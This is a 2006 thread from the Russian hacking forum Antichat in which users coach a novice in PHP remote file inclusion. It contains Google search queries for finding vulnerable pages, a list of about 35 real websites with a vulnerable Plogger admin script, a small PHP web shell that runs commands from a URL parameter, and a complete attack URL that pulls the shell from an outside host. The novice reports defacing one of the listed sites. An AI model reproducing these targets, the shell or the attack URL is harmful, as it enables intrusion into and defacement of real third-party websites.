Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Php инклудинг (https://forum.antichat.xyz/showthread.php?t=12827)

fram 11.01.2006 22:02
Php инклудинг
 
Привет!Может ктонибуть подсказать как искать сайты с пхп инжекцией!Я вчера полинета перерыл но нашел только один!!Подскжите как их искать или скажите несколько сайтов у которых есть эта уезвимость!ПЛИИЗ!

Utochka 11.01.2006 22:06
Есть такое понятие поисковик! =)
 
Есть такое понятие поисковик! =)

Юзай www.Google.ru

Можно искать запросами:
inurl:"page.php?page=" filetype:php
inurl:"index.php?page=" filetype:php
inurl:"page.php?page=" site:.ru
inurl:"page.php?p=" site:.ru
inurl:"index.php?page=" site:.com

Ну там много разных вариаций.

max_pain89 11.01.2006 22:18
половина из них сдохла, но может найдешь действующие

на удаленом хосте должен быть файл plog-functions.php

Код HTML:
http://www.magnapop.com/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.mindcyber.com/wallpaper/admin/plog-admin-functions.php?config[basedir]=
http://www.kasnews.de/kunst/admin/plog-admin-functions.php?config[basedir]=
http://www.distortion2static.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.ncfiremuseum.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://kelly.greneaux.com/pictures/admin/plog-admin-functions.php?config[basedir]=
http://216.22.25.215/~neeners/classic/gallery/admin/plog-admin-functions.php?config[basedir]=
http://musicbc.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.samson-mfg.com/gallery2/admin/plog-admin-functions.php?config[basedir]=
http://www.z90.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.dogtopia.biz/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.wilcofoppen.com/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.aabany.org/blog/galeria/admin/plog-admin-functions.php?config[basedir]=
http://www.newdesire.org/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.boricuapower.net/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.aurorapemper.com/pictures/admin/plog-admin-functions.php?config[basedir]=
http://91x.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.helpanimalsinc.org/pictures/admin/plog-admin-functions.php?config[basedir]=
http://www.trieste.si/miramare/plogger/admin/plog-admin-functions.php?config[basedir]=
http://dougal.gunters.org/test/plog/admin/plog-admin-functions.php?config[basedir]=
http://photos.pivwan.net/admin/plog-admin-functions.php?config[basedir]=
http://letatou.info/galerie/admin/plog-admin-functions.php?config[basedir]=
http://theg3nius.com/photoblog/admin/plog-admin-functions.php?config[basedir]=
http://www.diazvillanueva.com/fotografia/admin/plog-admin-functions.php?config[basedir]=
http://www.hunder.ca/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.coyforce.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.ourense.com/galerias/admin/plog-admin-functions.php?config[basedir]=
http://www.fjellbruk.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.karlshusgarasjene.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.uitvaartbeurs.info/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://caraga.dost.gov.ph/photoblog/admin/plog-admin-functions.php?config[basedir]=
http://www.rudylacy.com/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.thefinalfantasy.com/picturepost/admin/plog-admin-functions.php?config[basedir]=
http://www.azadadventures.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://galleria.aainaa.com/admin/plog-admin-functions.php?config[basedir]=

fram 11.01.2006 23:00
Ну чёт я не понял!!Я нашел сайт с инжекцией!!!Нашел файл залил его к себе на сайт а мне пишут
Fatal error: Cannot redeclare add_comment() (previously declared in /home/musicbco/public_html/ploggerb2/admin/plog-admin-functions.php:537) in http://site.narod.ru/plog-functions.php on line 377

Trinux 11.01.2006 23:09
учи матчасть =)
http://php.rinet.ru/manual/ru/function.include.php

max_pain89 11.01.2006 23:20
plog-functions.php должен быть шелл, либо от rst либо самописный, типа

PHP код:
<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

?>
Плагиат Ж)

Вот пример конечной ссылки:
admin/plog-admin-functions.php?config[basedir]=http://Пурум-пум-пум.narod.ru&cmd=id;pwd;uname+-a;ls+-la

причем http://Пурум-пум-пум.narod.ru/plog-functions.php это шелл-код

fram 12.01.2006 12:20
max_pain89!я нашел из списка сайт!Дефейснул его как ты сказал!!!!На пиши плиииззз описание этой уязвимости и как её искать

fram 12.01.2006 12:23
Кстати я залил в файл plog-functions.php шелл r57shell.php!начал дефейсить!Но выходит сообщение
Parse error: parse error, unexpected $, expecting ')' in http://framhack.narod.ru/plog-functions.php on line 787
что это и как можно исправить

max_pain89 12.01.2006 12:23
анти4ат против дефэйсов

fram 12.01.2006 12:47
ОК!Небуду дефейсить!Ну расскажи!ПЛИЗ!


Время: 06:04
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице